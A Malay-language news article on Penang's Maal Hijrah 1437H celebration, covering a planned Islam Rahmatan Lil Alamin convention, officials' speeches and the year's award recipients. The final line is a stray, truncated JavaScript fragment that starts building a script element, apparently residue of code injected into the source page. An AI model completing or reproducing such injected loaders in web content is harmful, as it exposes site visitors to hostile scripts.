Ellias Zakaria Tokoh Maal Hijrah 1437H P. Pinang

BERTAM – Konvensyen Islam Rahmatan Lil Alamin akan dianjurkan di peringkat negeri Pulau Pinang pada 6 hingga 8 November 2015, selepas moto dakwah itu diangkat sebagai tema Sambutan Maal Hijrah 1437H/2015M Peringkat Negeri Pulau Pinang baru-baru ini.

Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna, Dato’ Abdul Malik Abul Kassim semasa membuat pengumuman itu memberitahu, pemilihan tema tersebut adalah diilhamkan sendiri oleh bekas Ketua Pembangkang Parlimen Malaysia, Datuk Seri Anwar Ibrahim pada Februari lalu.

“Usaha menyemarakkan maksud Islam Rahmatan Lil ‘Alamin telahpun diilhamkan oleh mantan Ahli Parlimen Permatang Pauh, Datuk Seri Anwar Ibrahim untuk diangkat di peringkat negeri ini, (disusuli) dengan suatu ‘Konvensyen Islam Rahmat Ke Seluruh Alam’ diadakan di Kuala Lumpur pada awal (bulan) Februari lalu.

“Insya Allah, satu konvensyen Islam Rahmatan Lil ‘Alamin akan diadakan di Pulau Pinang pada 6, 7 dan 8 November ini, dengan ucaptama disampaikan oleh Mufti Besar Zimbabwe (Sheikh Ismail ibn Musa Menk),” katanya pada Majlis Himpunan Ummah di sini baru-baru ini.

Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon dalam ucapannya pula mengingatkan umat Islam supaya memperkasakan gerakan dakwah dengan menonjolkan kesederhanaan serta perasaan saling kasih sayang sesama manusia, ke arah agenda memartabatkan Islam di negeri ini.

“Agenda memartabatkan Islam di Pulau Pinang adalah agenda Kerajaan Negeri, maka, gerakan dakwah dengan menitikberatkan aspek wasatiyyah (kesederhanaan) dan kasih sayang sesama manusia akan membantu penghayatan tiap-tiap umat Islam pada maksud Islam Rahmatan Lil ‘Alamin,” jelasnya pada majlis dihadiri lebih 500 hadirin berkaitan.

Mohd. Rashid turut merakamkan penghargaan atas kehadiran Yang di-Pertua Negeri (TYT), Tun Dr. Abdul Rahman Abbas dengan diiringi isteri, Toh Puan Majimor Shariff, menyampaikan ucaptama serta merasmikan majlis sambutan Maal Hijrah kali ini.

Yang di-Pertua Majlis Agama Islam Negeri Pulau Pinang (MAINPP), Dato’ Mohd. Salleh Man, Dato’ Seri Farizan Darus (Setiausaha Kerajaan Negeri), Sohibus Samahah Dato’ Dr. Wan Salim Wan Mohd. Noor (Mufti Pulau Pinang), Y.A.A. Dato’ Abdul Walid Abu Hassan (Ketua Hakim Syarie Pulau Pinang), Dato’ Maktar Shapee (Timbalan Yang diPertua Dewan Undangan Negeri Pulau Pinang) dan Dato’ Sazali Hussein, Pengarah Jabatan Hal Ehwal Agama Islam Pulau Pinang (JHEAIPP) antara pemimpin Kerajaan Negeri yang turut hadir pada majlis sambutan tersebut.

Pada majlis berkaitan, Pengarah Pusat Transformasi Insan, Profesor Madya Datuk Al-Ustaz Ellias Zakaria dianugerahkan sebagai Tokoh Maal Hijrah Negeri Pulau Pinang pada tahun ini.

Ellias, 59, menerima sehelai jubah berwarna keemasan, medal, trofi, sijil penghargaan serta wang berjumlah RM8,000.

“Anugerah ini saya anggap untuk membentuk perubahan dalam menyumbang bakti dalam melaksanakan tugas-tugas dan menyampaikan dakwah atas prinsip melakukan kerja secara ikhlas kerana Allah S.W.T.

“Saya fikir ini adalah anugerah berdasarkan sumbangan saya melalui pelbagai institusi atau sukarela selama ini di samping perkhidmatan di peringkat universiti, negeri, kebangsaan dan antarabangsa yang bukan bertujuan untuk menerima anugerah, tetapi semangat ‘Saya Sayang USM’ yang ada di dalam diri,” jelasnya yang juga mantan Yang di-Pertua MAINPP.

Khadijah Lim Abdullah yang dipilih tokoh “Saudara Kita Cemerlang” pula memberitahu, anugerah serta penghargaan tersebut akan memberi motivasi kepada pasukannya, Islamic Propagation Society International (IPSI) untuk menggandakan kerja-kerja dakwah bukan Muslim di negeri ini.

“Terima kasih kepada Kerajaan Negeri…tidak dilupakan adalah IPSI kerana dari pertubuhan dakwah itulah yang banyak mengajar saya erti hidup dalam Islam,” jelas Khadijah, diiringi Pegawai JHEAIPP, Salmah Mohd. Sobri.

Pengerusi Jawatankuasa Kariah Masjid Taman Semilang, Abdul Alim Al-Araby Mohd. Salleh Al-Kahery turut melahirkan penghargaan kerana majlisnya dipilih menerima anugerah empat bintang sempena sambutan Maal Hijrah 1437H.

“Ini anugerah pertama yang masjid kita terima antaranya atas kerja-kerja kebajikan yang kita telah lakukan di peringkat kariah.

“Pada masa depan ini, kita akan menubuhkan ‘Klinik Ummah’ di mana kita akan memberi perkhidmatan kesihatan kepada semua bangsa tidak kira anak Melayu, anak Cina atau anak India terutama kepada anakanak kariah kita secara percuma,” jelas beliau sambil merakamkan penghargaan kepada Kerajaan Negeri.

var d=document;var s=d.createElement(‘script’);